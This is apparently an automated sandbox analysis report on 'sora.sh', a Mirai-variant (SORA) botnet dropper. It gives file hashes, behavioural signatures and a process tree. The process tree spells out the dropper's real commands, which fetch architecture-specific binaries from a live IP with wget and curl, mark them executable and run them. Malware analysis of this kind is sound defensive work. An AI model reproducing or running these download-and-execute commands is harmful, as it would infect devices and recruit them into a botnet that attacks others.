Analysis
-
max time kernel
150s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
03-08-2024 05:14
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sora.sh
-
Size
2KB
-
MD5
fe9fcc98f0d2d8350fd699bb3edf3419
-
SHA1
5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
-
SHA256
faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
-
SHA512
4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config
Extracted
mirai
SORA
Signatures
-
Contacts a large (43719) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 14 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 742 robben /tmp/robben 789 robben /tmp/robben 800 robben /tmp/robben 812 robben /tmp/robben 844 robben /tmp/robben 850 robben /tmp/robben 856 robben /tmp/robben 861 robben /tmp/robben 867 robben /tmp/robben 873 robben /tmp/robben 879 robben /tmp/robben 885 robben /tmp/robben 890 robben /tmp/robben 896 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
robbendescription ioc process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
Processes:
resource yara_rule /tmp/robben upx /tmp/robben upx /tmp/robben upx /tmp/robben upx -
Changes its process name 1 IoCs
Processes:
robbendescription ioc pid process Changes the process name, possibly in an attempt to hide itself daigbpgood5bkgo21b 789 robben -
Reads runtime system information 35 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlrobbencurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/685/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/705/exe robben File opened for reading /proc/771/exe robben File opened for reading /proc/869/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/684/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/665/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/775/exe robben File opened for reading /proc/809/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/687/exe robben File opened for reading /proc/699/exe robben File opened for reading /proc/706/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/793/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/881/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/668/exe robben File opened for reading /proc/676/exe robben File opened for reading /proc/704/exe robben File opened for reading /proc/811/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/790/exe robben File opened for reading /proc/709/exe robben File opened for reading /proc/713/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/890/exe robben -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlwgetwgetwgetcurlcurlwgetcurlwgetwgetwgetcurlcurlwgetcurlcurlwgetwgetsora.shcurlcurlwgetcurlcurlcurldescription ioc process File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.mips curl
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:709 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x862⤵
- Writes file to tmp directory
PID:714 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735 -
/bin/catcat sora.x862⤵PID:739
-
/bin/chmodchmod +x robben sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S92⤵PID:741
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:742 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mips2⤵
- Writes file to tmp directory
PID:745 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:786 -
/bin/catcat sora.mips2⤵PID:787
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S92⤵PID:788
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:789 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:796 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797 -
/bin/catcat sora.x86_642⤵PID:798
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S92⤵PID:799
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:800 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i4682⤵PID:802
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803 -
/bin/catcat sora.i4682⤵PID:810
-
/bin/chmodchmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-Jph6S92⤵PID:811
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:812 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i6862⤵
- Writes file to tmp directory
PID:815 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822 -
/bin/catcat sora.i6862⤵PID:842
-
/bin/chmodchmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_642⤵PID:843
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:844 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:846 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847 -
/bin/catcat sora.mpsl2⤵PID:848
-
/bin/chmodchmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:849
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:850 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm42⤵PID:852
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853 -
/bin/catcat sora.arm42⤵PID:854
-
/bin/chmodchmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:855
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:856 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm52⤵
- Writes file to tmp directory
PID:857 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858 -
/bin/catcat sora.arm52⤵PID:859
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:860
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:861 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm62⤵
- Writes file to tmp directory
PID:863 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864 -
/bin/catcat sora.arm62⤵PID:865
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:866
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:867 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm72⤵
- Writes file to tmp directory
PID:869 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870 -
/bin/catcat sora.arm72⤵PID:871
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:872
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:873 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:875 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876 -
/bin/catcat sora.ppc2⤵PID:877
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_642⤵PID:878
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:879 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.ppc440fp2⤵PID:881
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882 -
/bin/catcat sora.ppc440fp2⤵PID:883
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_642⤵PID:884
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:885 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:886 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887 -
/bin/catcat sora.m68k2⤵PID:888
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_642⤵PID:889
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:890 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.sh42⤵
- Writes file to tmp directory
PID:892 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893 -
/bin/catcat sora.sh42⤵PID:894
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_642⤵PID:895
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5545cc0b3e5dae8244debe55a41e14a9f
SHA1101ad459b5b114c0a79c458cd0c0d2374a3698a1
SHA256a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91
SHA5121e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611
-
Filesize
28KB
MD58d068eba527935d34fbff880f4cf7530
SHA182f50f55fb025735b62fca14362600132b21c2d0
SHA256bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147
SHA5126cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14
-
Filesize
28KB
MD5fa8042bc292cb4403494d779833de7ca
SHA1a78431e9ef2fac7f3a909c06a81e643369a17ee4
SHA2561ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5
SHA512fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5a9d839dd97abb474595bc7e18157aa64
SHA182c1ec7eae6dd1bc7dcfd1e89911d328c899c885
SHA2563bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d
SHA5124311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993
-
Filesize
64KB
MD55092e7b4c0b2e9e418ca596ddad29165
SHA141edb1d01dcd2bacfd437cad4af32791e473e1c0
SHA25643c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845
SHA512d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742